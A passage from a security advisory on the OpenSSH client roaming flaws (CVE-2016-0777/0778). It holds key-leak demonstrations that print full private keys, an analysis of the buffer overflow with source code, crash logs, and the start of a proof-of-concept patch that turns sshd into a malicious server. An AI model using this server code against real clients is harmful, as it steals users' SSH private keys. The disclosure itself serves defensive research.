Overflow section)\n\n# cat /tmp/roaming-a5eca355/infoleak\nry+AtEOxWUwIkVKjm48Wry2CxroURqn6Zqohzdra\nuWPGxUsKUvtNGpM4hKCHFQKBgQCM8ylXkRZZOTjeogc4aHAzJ1KL+VptQKsYPudc\nprs0RnwsAmfDQYnUXLEQb6uFrVHIdswrGvdXFuJ/ujEhoPqjlp5ICPcoC/qil5rO\nZAX4i7PRvSoRLpMnN6mGpaV2mN8pZALzraGG+pnPnHmCqRTdw2Jy/NNSofdayV8V\n8ZDkWQKBgQC2pNzgDrXLe+DIUvdKg88483kIR/hP2yJG1V7s+NaDEigIk8BO6qvp\nppa4JYanVDl2TpV258nE0opFQ66Q9sN61SfWfNqyUelZTOTzJIsGNgxDFGvyUTrz\nuiC4d/e3Jlxj21nUciQIe4imMb6nGFbUIsylUrDn8GfA65aePLuaSg==\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: CentOS 7, 1024-bit DSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"CentOS Linux 7 (Core)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_dsa\n-----BEGIN DSA PRIVATE KEY-----\nMIIBvQIBAAKBgQDmjJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5n\nGLnZn1lmDldNaqhV0ECESXZVEpq/8TR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsCioD2\nhUaU7sV6Nho9fJIclxuxZP8j+uzidQKKN/+CVbQougsLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4=\n-----END DSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-b7b16dfc/infoleak\njJYHvennuPmKGxfMuNc4nW2Z1via6FkkZILWOO1QJLB5OXqe\nkt7t/AAr+1n0lJbC1Q8hP01LFnxKoqqWfHQIuQL+S88yr5T8KY/VxV9uCVKpQk5\n\n# strings /tmp/roaming-b324ce87/infoleak\nIuQL\nR2m2XjSmE+7Y14hI0cjBdnOz2X8wIVAP0a\nNmtvmc4H+iFvKorV4B+tqRmvAoGBAKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9v\n\n# strings /tmp/roaming-24011739/infoleak\nKjE7ps031YRb6S3htr/ncPlXKtNTSTwaakC\no7l7mJT+lI9vTrQsu3QCLAUZnmVHAIj/m9juk8kXkZvEBXJuPVdL0tCRNAsC\n\n# strings /tmp/roaming-37456846/infoleak\nLsBlstpuQ4Hr2DHmalL8X\niISkLhuyAoGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZNA\nyq4Kwj/\n\n# strings /tmp/roaming-988ff54c/infoleak\nGBAKKRxVAVr2Q72Xz6vRmbULRvsfG1sSxNHOssA9CWKByOjDr2mo1l\nB7oIhTZ+eGvtHjiOozM0PzlcRSu5ZY3ZN2hfXITp9/4oatxFUV5V8aniqyq4Kwj/\n\n# strings /tmp/roaming-53887fa5/infoleak\n/4oatxFUV5V8aniqyq4Kwj/\nQlCmHO7eRlPArhylx8uRnoHkbTRe+by5fmPImz/3WUtgPnx8y3NOEsCtAhUApdtS\nF9AoVoZFKEGn4FEoYIqY3a4\n\n------------------------------------------------------------------------\nPrivate Key Disclosure example: Fedora 20, 2048-bit RSA key\n------------------------------------------------------------------------\n\n$ grep PRETTY_NAME= /etc/os-release\nPRETTY_NAME=\"Fedora 20 (Heisenbug)\"\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ cat ~/.ssh/id_rsa\n-----BEGIN RSA PRIVATE KEY-----\nMIIEogIBAAKCAQEAmbj/XjOppLWSAhuLKiRoHsdp66LJdY2PvP0ht3GWDKKCk7Gz\nHLas5VjotS9rmupavGGDiicMHPClOttWAI9MRyvP77iZhSei/RzX1/UKk/broTDp\no9ljBnQTzRAyw8ke72Ih77SOGfOLBvYlx80ZmESLYYH95aAeuuDvb236JnsgRPDQ\n/B/gyRIhfqis70USi05/ZbnAenFn+v9zoSduDYMzSM8mFmh9f+9PVb9qMHdfNkIy\n2E78kt9BknU/bEcCWyL+IXNLV0rgRGAcE0ncKu13YvuH/7o4Q7bW2FYErT4P/FHK\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9w9gf1zGqWkTytMiqcawMW4LZAJlSI/rGWe7lYHuceZSSgzd5lF4VP06\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+prtAxpPNfKElEV7ZPBrTRAuCUr\nHiy7yflZ3w0qHekNafX/tnWiU4zi/p6aD4rs10YaYSnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\njwj3EZsXmtP+wd3fhge7pIHp5RiKfBn0JtSvXQQHO0k0eEcQ4aA/6yESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4syLfm\nqK+cwb7uCSi5PfloRiLryPdvnobDGLfFGdOHaX7km+4u5+taYg2Er8IsAxtMNwM5\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\nZS16+aH97RKdJD/4qiskzzHvZs+wi4LKPHHHz7ETXr/m4CRfMIU=\n-----END RSA PRIVATE KEY-----\n\n# env ROAMING=\"heap_massaging:linux\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -p 222 127.0.0.1\n... \n\n# strings /tmp/roaming-a2bbc5f6/infoleak\ncRmpbVfAzJQb85uXUXaNLVW0A/gHqTaGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CG\n\n# strings /tmp/roaming-47b46456/infoleak\nRGAcE0nc\nGCUWJUwIDAQABAoIBAD0ZpB8MR9SY+uTt\nj737ZIs/VeF7/blEwCotLvacJjj1axNLYVb7YPN0CGLj61BS8CfKVp9V7+Gc4P/o\n6GEmk/oB9\n\n# strings /tmp/roaming-7a6717ae/infoleak\ncawMW4LZ1\nXz/wTMkSDZh/M6zOnQhImcLforsiPbTKKIVLL6u13VUmDcYfaBh9VepjyN8i+KIV\nJQB26MlXSxuAp8o0BQUI8FY/dsObJ9xjMT/u2+p\n\n# strings /tmp/roaming-f3091f08/infoleak\nlZ3w0qHe\nnSolsDs2k8wHbVP4VtLE8l\nPRfXS6ECgYEAyVf7Pr3TwTa0pPEk1dLz3XHoetTqUND/0Kv+i7MulBzJ4LbcsTEJ\n\n# strings /tmp/roaming-62a9e9a3/infoleak\nlZ3w0qHe\nr3TwTa0pPEk11\nLbcsTEJ\nrtOuGGpLrAYlIvCgT+F26mov5fRGsjjnmP3P/PsvzR8Y9DhiWl9R7qyvNznQYxjo\n/euhzdYixxIkfqyopnYFoER26u37/OHe37P\n\n# strings /tmp/roaming-8de31ed5/infoleak\n7qyvNznQ\n26u37/OHe37PH+8U1JitVrhv7s4NYztECgYEAw3Ot\ngxMqsKh42ydIv1sBg1QEHu0TNvyYy7WCB8jnMsygUQ8EEJs7iKP//CEGRdDAwyGa\n\n# strings /tmp/roaming-f5e0fbcc/infoleak\nyESI62wOuaY\nvJ+q7WMo1wHtMoqRPtW/OAxUf91dQRtzK/GpRuMCgYAc7lh6vnoT9FFmtgPN+b7y\n3fBC3h9BN5banCw6VKfnvm8/q+bwSxS\n\n# strings /tmp/roaming-9be933df/infoleak\nQRtzK/GpRuMC1\nC3h9BN5banCw6VKfnvm8/q+bwSxSSG3aTqYpwEH37lEnk0IfuzQ1O5JfX+hdF\nQ4tEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmT\n\n# strings /tmp/roaming-ee4d1e6c/infoleak\nSG3aTqYp\ntEVa+bsNE8HnH7fGDgg821iMgpxSWNfvNECXX71t6JmTOun5zVV6EixsmDn80P\npdyhj8fAUU/BceHr/H6hUQKBgCX5SqPlzGyIPvrtVf//s\n\n# strings /tmp/roaming-c2bfd69c/infoleak\nSG3aTqYp\n6JmTOun5zVV6A\nH6hUQKBgCX5SqPlzGyIPvrtVf//sXqPj0Fm9E3Bo/ooKLxU\ndz7ybM9y6GpFjrqMioa07+AOn/UJiVry9fXQuTRWre+CqRQEWpuqtgPR0c4s\n\n# strings /tmp/roaming-2b3217a1/infoleak\nDGLfFGdO\nr5bbAoGAfxRRGMamXIha8xaJwQnHKC/9v7r79LPFoht/EJ7jw/k8n8yApoLBLBYp\nP/jXU44sbtWB3g3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCQ\n\n# strings /tmp/roaming-1e275747/infoleak\ng3eARxPL3HBLVVMWfW9ob7XxI4lKqCQ9cuKCBqosVbEQhNKZAj+\n\n\n========================================================================\nBuffer Overflow (CVE-2016-0778)\n========================================================================\n\n------------------------------------------------------------------------\nAnalysis\n------------------------------------------------------------------------\n\nSupport for roaming was elegantly added to the OpenSSH client: the calls\nto read() and write() that communicate with the SSH server were replaced\nby calls to roaming_read() and roaming_write(), two wrappers that depend\non wait_for_roaming_reconnect() to transparently reconnect to the server\nafter a disconnection. The wait_for_roaming_reconnect() routine is\nessentially a sequence of four subroutines:\n\n239 int\n240 wait_for_roaming_reconnect(void)\n241 {\n... \n250 fprintf(stderr, \"[connection suspended, press return to resume]\");\n... \n252 packet_backup_state();\n253 /* TODO Perhaps we should read from tty here */\n254 while ((c = fgetc(stdin)) != EOF) {\n... \n259 if (c != \u0027\\n\u0027 \u0026\u0026 c != \u0027\\r\u0027)\n260 continue;\n261\n262 if (ssh_connect(host, \u0026hostaddr, options.port,\n... \n265 options.proxy_command) == 0 \u0026\u0026 roaming_resume() == 0) {\n266 packet_restore_state();\n... \n268 fprintf(stderr, \"[connection resumed]\\n\");\n... \n270 return 0;\n271 }\n272\n273 fprintf(stderr, \"[reconnect failed, press return to retry]\");\n... \n275 }\n276 fprintf(stderr, \"[exiting]\\n\");\n... \n278 exit(0);\n279 }\n\n1. packet_backup_state() close()s connection_in and connection_out (the\nold file descriptors that connected the client to the server), and saves\nthe state of the suspended SSH session (for example, the encryption and\ndecryption contexts). \n\n2. ssh_connect() opens new file descriptors, and connects them to the\nSSH server. \n\n3. roaming_resume() negotiates the resumption of the suspended SSH\nsession with the server, and calls resend_bytes(). \n\n4. packet_restore_state() updates connection_in and connection_out (with\nthe new file descriptors that connect the client to the server), and\nrestores the state of the suspended SSH session. \n\nThe new file descriptors for connection_in and connection_out may differ\nfrom the old ones (if, for example, files or pipes or sockets are opened\nor closed between two successive ssh_connect() calls), but unfortunately\nhistorical code in OpenSSH assumes that they are constant:\n\n- In client_loop(), the variables connection_in and connection_out are\n cached locally, but packet_write_poll() calls roaming_write(), which\n may assign new values to connection_in and connection_out (if a\n reconnection occurs), and client_wait_until_can_do_something()\n subsequently reuses the old, cached values. \n\n- client_loop() eventually updates these cached values, and the\n following FD_ISSET() uses a new, updated file descriptor (the fd\n connection_out), but an old, out-of-date file descriptor set (the\n fd_set writeset). \n\n- packet_read_seqnr() (old API, or ssh_packet_read_seqnr(), new API)\n first calloc()ates setp, a file descriptor set for connection_in;\n next, it loops around memset(), FD_SET(), select() and roaming_read();\n last, it free()s setp and returns. Unfortunately, roaming_read() may\n reassign a higher value to connection_in (if a reconnection occurs),\n but setp is never enlarged, and the following memset() and FD_SET()\n may therefore overflow setp (a heap-based buffer overflow):\n\n1048 int\n1049 packet_read_seqnr(u_int32_t *seqnr_p)\n1050 {\n.... \n1052 fd_set *setp;\n.... \n1058 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_in + 1,\n1059 NFDBITS), sizeof(fd_mask));\n.... \n1065 for (;;) {\n.... \n1075 if (type != SSH_MSG_NONE) {\n1076 free(setp);\n1077 return type;\n1078 }\n.... \n1083 memset(setp, 0, howmany(active_state-\u003econnection_in + 1,\n1084 NFDBITS) * sizeof(fd_mask));\n1085 FD_SET(active_state-\u003econnection_in, setp);\n.... \n1092 for (;;) {\n.... \n1097 if ((ret = select(active_state-\u003econnection_in + 1, setp,\n1098 NULL, NULL, timeoutp)) \u003e= 0)\n1099 break;\n.... \n1115 }\n.... \n1117 do {\n.... \n1119 len = roaming_read(active_state-\u003econnection_in, buf,\n1120 sizeof(buf), \u0026cont);\n1121 } while (len == 0 \u0026\u0026 cont);\n.... \n1130 }\n1131 /* NOTREACHED */\n1132 }\n\n- packet_write_wait() (old API, or ssh_packet_write_wait(), new API) is\n basically similar to packet_read_seqnr() and may overflow its own setp\n if roaming_write() (called by packet_write_poll()) reassigns a higher\n value to connection_out (after a successful reconnection):\n\n1739 void\n1740 packet_write_wait(void)\n1741 {\n1742 fd_set *setp;\n.... \n1746 setp = (fd_set *)xcalloc(howmany(active_state-\u003econnection_out + 1,\n1747 NFDBITS), sizeof(fd_mask));\n1748 packet_write_poll();\n1749 while (packet_have_data_to_write()) {\n1750 memset(setp, 0, howmany(active_state-\u003econnection_out + 1,\n1751 NFDBITS) * sizeof(fd_mask));\n1752 FD_SET(active_state-\u003econnection_out, setp);\n.... \n1758 for (;;) {\n.... \n1763 if ((ret = select(active_state-\u003econnection_out + 1,\n1764 NULL, setp, NULL, timeoutp)) \u003e= 0)\n1765 break;\n.... \n1776 }\n.... \n1782 packet_write_poll();\n1783 }\n1784 free(setp);\n1785 }\n\n------------------------------------------------------------------------\nMitigating Factors\n------------------------------------------------------------------------\n\nThis buffer overflow affects all OpenSSH clients \u003e= 5.4, but its impact\nis significantly reduced by the Mitigating Factors detailed in the\nInformation Leak section, and additionally:\n\n- OpenSSH versions \u003e= 6.8 reimplement packet_backup_state() and\n packet_restore_state(), but introduce a bug that prevents the buffer\n overflow from being exploited; indeed, ssh_packet_backup_state() swaps\n two local pointers, ssh and backup_state, instead of swapping the two\n global pointers active_state and backup_state:\n\n 9 struct ssh *active_state, *backup_state;\n... \n238 void\n239 packet_backup_state(void)\n240 {\n241 ssh_packet_backup_state(active_state, backup_state);\n242 }\n243\n244 void\n245 packet_restore_state(void)\n246 {\n247 ssh_packet_restore_state(active_state, backup_state);\n248 }\n\n2269 void\n2270 ssh_packet_backup_state(struct ssh *ssh,\n2271 struct ssh *backup_state)\n2272 {\n2273 struct ssh *tmp;\n.... \n2279 if (backup_state)\n2280 tmp = backup_state;\n2281 else\n2282 tmp = ssh_alloc_session_state();\n2283 backup_state = ssh;\n2284 ssh = tmp;\n2285 }\n.... \n2291 void\n2292 ssh_packet_restore_state(struct ssh *ssh,\n2293 struct ssh *backup_state)\n2294 {\n2295 struct ssh *tmp;\n.... \n2299 tmp = backup_state;\n2300 backup_state = ssh;\n2301 ssh = tmp;\n2302 ssh-\u003estate-\u003econnection_in = backup_state-\u003estate-\u003econnection_in;\n\n As a result, the global pointer backup_state is still NULL when passed\n to ssh_packet_restore_state(), and crashes the OpenSSH client when\n dereferenced:\n\n# env ROAMING=\"overflow:A fd_leaks:0\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.8, LibreSSL 2.1\n\n$ /usr/bin/ssh -o ProxyCommand=\"/usr/bin/nc -w 15 %h %p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume]Segmentation fault (core dumped)\n\n This bug prevents the buffer overflow from being exploited, but not\n the information leak, because the vulnerable function resend_bytes()\n is called before ssh_packet_restore_state() crashes. \n\n------------------------------------------------------------------------\nFile Descriptor Leak\n------------------------------------------------------------------------\n\nA back-of-the-envelope calculation indicates that, in order to increase\nthe file descriptor connection_in or connection_out, and thus overflow\nthe file descriptor set setp in packet_read_seqnr() or\npacket_write_wait(), a file descriptor leak is needed:\n\n- First, the number of bytes calloc()ated for setp is rounded up to the\n nearest multiple of sizeof(fd_mask): 8 bytes (or 64 file descriptors)\n on 64-bit systems. \n\n- Next, in glibc, this number is rounded up to the nearest multiple of\n MALLOC_ALIGNMENT: 16 bytes (or 128 file descriptors) on 64-bit\n systems. \n\n- Last, in glibc, a MIN_CHUNK_SIZE is enforced: 32 bytes on 64-bit\n systems, of which 24 bytes (or 192 file descriptors) are reserved for\n setp. \n\n- In conclusion, a file descriptor leak is needed, because connection_in\n or connection_out has to be increased by hundreds in order to overflow\n setp. \n\nThe search for a suitable file descriptor leak begins with a study of\nthe behavior of the four ssh_connect() methods, when called for a\nreconnection by wait_for_roaming_reconnect():\n\n1. The default method ssh_connect_direct() communicates with the server\nthrough a simple TCP socket: the two file descriptors connection_in and\nconnection_out are both equal to this socket\u0027s file descriptor. \n\nIn wait_for_roaming_reconnect(), the low-numbered file descriptor of the\nold TCP socket is close()d by packet_backup_state(), but immediately\nreused for the new TCP socket in ssh_connect_direct(): the new file\ndescriptors connection_in and connection_out are equal to this old,\nlow-numbered file descriptor, and cannot possibly overflow setp. \n\n2. The special ProxyCommand \"-\" communicates with the server through\nstdin and stdout, but (as explained in the Mitigating Factors of the\nInformation Leak section) it cannot possibly reconnect to the server,\nand is therefore immune to this buffer overflow. \n\n3. Surprisingly, we discovered a file descriptor leak in the\nssh_proxy_fdpass_connect() method itself; indeed, the file descriptor\nsp[1] is never close()d:\n\n 101 static int\n 102 ssh_proxy_fdpass_connect(const char *host, u_short port,\n 103 const char *proxy_command)\n 104 {\n ... \n 106 int sp[2], sock;\n ... \n 113 if (socketpair(AF_UNIX, SOCK_STREAM, 0, sp) \u003c 0)\n 114 fatal(\"Could not create socketpair to communicate with \"\n 115 \"proxy dialer: %.100s\", strerror(errno));\n ... \n 161 close(sp[0]);\n ... \n 164 if ((sock = mm_receive_fd(sp[1])) == -1)\n 165 fatal(\"proxy dialer did not pass back a connection\");\n ... \n 171 /* Set the connection file descriptors. */\n 172 packet_set_connection(sock, sock);\n 173\n 174 return 0;\n 175 }\n\nHowever, two different reasons prevent this file descriptor leak from\ntriggering the setp overflow:\n\n- The method ssh_proxy_fdpass_connect() communicates with the server\n through a single socket received from the ProxyCommand: the two file\n descriptors connection_in and connection_out are both equal to this\n socket\u0027s file descriptor. \n\n In wait_for_roaming_reconnect(), the low-numbered file descriptor of\n the old socket is close()d by packet_backup_state(), reused for sp[0]\n in ssh_proxy_fdpass_connect(), close()d again, and eventually reused\n again for the new socket: the new file descriptors connection_in and\n connection_out are equal to this old, low-numbered file descriptor,\n and cannot possibly overflow setp. \n\n- Because of the waitpid() bug described in the Mitigating Factors of\n the Information Leak section, the method ssh_proxy_fdpass_connect()\n calls fatal() before it returns to wait_for_roaming_reconnect(), and\n is therefore immune to this buffer overflow. \n\n4. The method ssh_proxy_connect() communicates with the server through a\nProxyCommand and two different pipes: the file descriptor connection_in\nis the read end of the second pipe (pout[0]), and the file descriptor\nconnection_out is the write end of the first pipe (pin[1]):\n\n 180 static int\n 181 ssh_proxy_connect(const char *host, u_short port, const char *proxy_command)\n 182 {\n ... \n 184 int pin[2], pout[2];\n ... \n 192 if (pipe(pin) \u003c 0 || pipe(pout) \u003c 0)\n 193 fatal(\"Could not create pipes to communicate with the proxy: %.100s\",\n 194 strerror(errno));\n ... \n 240 /* Close child side of the descriptors. */\n 241 close(pin[0]);\n 242 close(pout[1]);\n ... \n 247 /* Set the connection file descriptors. */\n 248 packet_set_connection(pout[0], pin[1]);\n 249\n 250 /* Indicate OK return */\n 251 return 0;\n 252 }\n\nIn wait_for_roaming_reconnect(), the two old, low-numbered file\ndescriptors connection_in and connection_out are both close()d by\npacket_backup_state(), and immediately reused for the pipe(pin) in\nssh_proxy_connect(): the new connection_out (pin[1]) is equal to one of\nthese old, low-numbered file descriptors, and cannot possibly overflow\nsetp. \n\nOn the other hand, the pipe(pout) in ssh_proxy_connect() may return\nhigh-numbered file descriptors, and the new connection_in (pout[0]) may\ntherefore overflow setp, if hundreds of file descriptors were leaked\nbefore the call to wait_for_roaming_reconnect():\n\n- We discovered a file descriptor leak in the pubkey_prepare() function\n of OpenSSH \u003e= 6.8; indeed, if the client is running an authentication\n agent that does not offer any private keys, the reference to agent_fd\n is lost, and this file descriptor is never close()d:\n\n1194 static void\n1195 pubkey_prepare(Authctxt *authctxt)\n1196 {\n.... \n1200 int agent_fd, i, r, found;\n.... \n1247 if ((r = ssh_get_authentication_socket(\u0026agent_fd)) != 0) {\n1248 if (r != SSH_ERR_AGENT_NOT_PRESENT)\n1249 debug(\"%s: ssh_get_authentication_socket: %s\",\n1250 __func__, ssh_err(r));\n1251 } else if ((r = ssh_fetch_identitylist(agent_fd, 2, \u0026idlist)) != 0) {\n1252 if (r != SSH_ERR_AGENT_NO_IDENTITIES)\n1253 debug(\"%s: ssh_fetch_identitylist: %s\",\n1254 __func__, ssh_err(r));\n1255 } else {\n.... \n1288 authctxt-\u003eagent_fd = agent_fd;\n1289 }\n.... \n1299 }\n\n However, OpenSSH clients \u003e= 6.8 crash in ssh_packet_restore_state()\n (because of the NULL-pointer dereference discussed in the Mitigating\n Factors of the Buffer Overflow section) and are immune to the setp\n overflow, despite this agent_fd leak. \n\n- If ForwardAgent (-A) or ForwardX11 (-X) is enabled in the OpenSSH\n client (it is disabled by default), a malicious SSH server can request\n hundreds of forwardings, in order to increase connection_in (each\n forwarding opens a file descriptor), and thus overflow setp in\n packet_read_seqnr():\n\n# env ROAMING=\"overflow:A\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /dev/null -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.6.1p1 Ubuntu-2ubuntu2, OpenSSL 1.0.1f 6 Jan 2014\n\n$ /usr/bin/ssh-agent -- /usr/bin/ssh -A -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007f0474d03e70 ***\nAborted (core dumped)\n\n# env ROAMING=\"overflow:X\" \"`pwd`\"/sshd -o ListenAddress=127.0.0.1:222 -o UsePrivilegeSeparation=no -f /etc/ssh/sshd_config -h /etc/ssh/ssh_host_rsa_key\n\n$ /usr/bin/ssh -V\nOpenSSH_6.4p1, OpenSSL 1.0.1e-fips 11 Feb 2013\n\n$ /usr/bin/ssh -X -o ProxyCommand=\"/usr/bin/socat - TCP4:%h:%p\" -p 222 127.0.0.1\nuser@127.0.0.1\u0027s password:\n[connection suspended, press return to resume][connection resumed]\n*** Error in `/usr/bin/ssh\u0027: free(): invalid next size (fast): 0x00007fdcc2a3aba0 ***\n*** Error in `/usr/bin/ssh\u0027: malloc(): memory corruption: 0x00007fdcc2a3abc0 ***\n\nFinally, a brief digression on two unexpected problems that had to be\nsolved in our proof-of-concept:\n\n- First, setp can be overflowed only in packet_read_seqnr(), not in\n packet_write_wait(), but agent forwarding and X11 forwarding are post-\n authentication functionalities, and post-authentication calls to\n packet_read() or packet_read_expect() are scarce, except in the\n key-exchange code of OpenSSH clients \u003c 6.8: our proof-of-concept\n effectively forces a rekeying in order to overflow setp in\n packet_read_seqnr(). \n\n- Second, after a successful reconnection, packet_read_seqnr() may call\n fatal(\"Read from socket failed: %.100s\", ...), because roaming_read()\n may return EAGAIN (EAGAIN is never returned without the reconnection,\n because the preceding call to select() guarantees that connection_in\n is ready for read()). Our proof-of-concept works around this problem\n by forcing the client to resend MAX_ROAMBUF bytes (2M) to the server,\n allowing data to reach the client before roaming_read() is called,\n thus avoiding EAGAIN. \n\n\n========================================================================\nAcknowledgments\n========================================================================\n\nWe would like to thank the OpenSSH developers for their great work and\ntheir incredibly quick response, Red Hat Product Security for promptly\nassigning CVE-IDs to these issues, and Alexander Peslyak of the Openwall\nProject for the interesting discussions. \n\n\n========================================================================\nProof Of Concept\n========================================================================\n\ndiff -pruN openssh-6.4p1/auth2-pubkey.c openssh-6.4p1+roaming/auth2-pubkey.c\n--- openssh-6.4p1/auth2-pubkey.c\t2013-07-17 23:10:10.000000000 -0700\n+++ openssh-6.4p1+roaming/auth2-pubkey.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -169,7 +169,9 @@ userauth_pubkey(Authctxt *authctxt)\n \t\t * if a user is not allowed to login. is this an\n \t\t * issue? -markus\n \t\t */\n-\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key))) {\n+\t\tif (PRIVSEP(user_key_allowed(authctxt-\u003epw, key)) || 1) {\n+\t\t\tdebug(\"%s: force client-side load_identity_file\",\n+\t\t\t __func__);\n \t\t\tpacket_start(SSH2_MSG_USERAUTH_PK_OK);\n \t\t\tpacket_put_string(pkalg, alen);\n \t\t\tpacket_put_string(pkblob, blen);\ndiff -pruN openssh-6.4p1/kex.c openssh-6.4p1+roaming/kex.c\n--- openssh-6.4p1/kex.c\t2013-06-01 14:31:18.000000000 -0700\n+++ openssh-6.4p1+roaming/kex.c\t2016-01-07 01:04:15.000000000 -0800\n@@ -442,6 +442,73 @@ proposals_match(char *my[PROPOSAL_MAX],\n }\n \n static void\n+roaming_reconnect(void)\n+{\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_RESUME);\n+\tconst u_int id = packet_get_int(); /* roaming_id */\n+\tdebug(\"%s: id %u\", __func__, id);\n+\tpacket_check_eom();\n+\n+\tconst char *const dir = get_roaming_dir(id);\n+\tdebug(\"%s: dir %s\", __func__, dir);\n+\tconst int fd = open(dir, O_RDONLY | O_NOFOLLOW | O_NONBLOCK);\n+\tif (fd \u003c= -1)\n+\t\tfatal(\"%s: open %s errno %d\", __func__, dir, errno);\n+\tif (fchdir(fd) != 0)\n+\t\tfatal(\"%s: fchdir %s errno %d\", __func__, dir, errno);\n+\tif (close(fd) != 0)\n+\t\tfatal(\"%s: close %s errno %d\", __func__, dir, errno);\n+\n+\tpacket_start(SSH2_MSG_KEX_ROAMING_AUTH_REQUIRED);\n+\tpacket_put_int64(arc4random()); /* chall */\n+\tpacket_put_int64(arc4random()); /* oldchall */\n+\tpacket_send();\n+\n+\tpacket_read_expect(SSH2_MSG_KEX_ROAMING_AUTH);\n+\tconst u_int64_t client_read_bytes = packet_get_int64();\n+\tdebug(\"%s: client_read_bytes %llu\", __func__,\n+\t (unsigned long long)client_read_bytes);\n+\tpacket_get_int64(); /* digest (1-8) */\n+\tpacket_get_int64(); /* digest (9-16) */\n+\tpacket_get_int(); /* digest (17-20) */\n+\tpacket_check_eom();\n+\n+\tu_int64_t client_write_bytes;\n+\tsize_t len = sizeof(client_write_bytes);\n+\tload_roaming_file(\"client_write_bytes\", \u0026client_write_bytes, \u0026len);\n+\tdebug(\"%s: client_write_bytes %llu\", __func__,\n+\t (unsigned long long)client_write_bytes);\n+\n+\tu_int client_out_buf_size;\n+\tlen = sizeof(client_out_buf_size);\n+\tload_roaming_file(\"client_out_buf_size\", \u0026client_out_buf_size, \u0026len);\n+\tdebug(\"%s: client_out_buf_size %u\", __func__, 